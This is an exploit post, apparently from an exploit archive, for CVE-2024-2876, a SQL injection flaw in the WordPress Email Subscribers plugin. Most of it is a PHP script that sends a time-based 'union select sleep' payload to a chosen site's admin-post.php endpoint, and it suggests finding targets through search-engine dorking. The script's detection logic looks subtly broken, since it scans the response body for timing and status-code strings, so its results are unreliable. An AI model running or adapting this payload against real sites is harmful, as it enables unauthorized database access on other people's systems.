=============================================================================================================================================
| # Title     : wordpress Email Subscribers 5.7.14 Sql Injection vulnerability                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://wordpress.org/plugins/email-subscribers/                                                                            |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The Email Subscribers – Email Marketing, Newsletters, Automation for WordPress and WooCommerce plugin for WordPress is vulnerable to SQL Injection

    (Related : https://packetstorm.news/files/id/188767/ Related CVE numbers:	CVE-2024-2876 ) .
	
[+] Payload : 

[+] Set Target : line 52.

[+] Usage : php poc.php 

[+] PayLoad :

<?php
// CVE-2024-2876: SQL Injection Wordpress
// Author: indoushka


// Function to perform the SQL Injection test using cURL
function test_sql_injection($hostname) {
    $url = "http://{$hostname}/wp-admin/admin-post.php";
    $postFields = "page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111";
    
    $headers = [
        "Host: {$hostname}",
        "Content-Type: application/x-www-form-urlencoded",
    ];
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20); // Timeout set to 20 seconds
    
    // Execute cURL and get the response
    $response = curl_exec($ch);
    
    // Check if cURL request was successful
    if(curl_errno($ch)) {
        echo "cURL Error: " . curl_error($ch);
    } else {
        // Check for response characteristics (DSL conditions)
        $duration = substr($response, strpos($response, "duration") + 9, 4); // Adjust as needed based on response structure
        $status_code = substr($response, strpos($response, "status_code") + 12, 3); // Adjust as needed
        $header = substr($response, strpos($response, "header") + 7, 100); // Adjust based on actual response
        
        // Conditions matching (duration, status_code, header content)
        if ($duration >= 4 && $status_code == 200 && strpos($header, "application/json") !== false) {
            echo "SQL Injection vulnerability found!\n";
        } else {
            echo "No vulnerability detected.\n";
        }
    }
    
    // Close cURL session
    curl_close($ch);
}

// Example usage (Replace {{Hostname}} with the target hostname)
$hostname = 'example.com';  // Change this to your target
test_sql_injection($hostname);
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================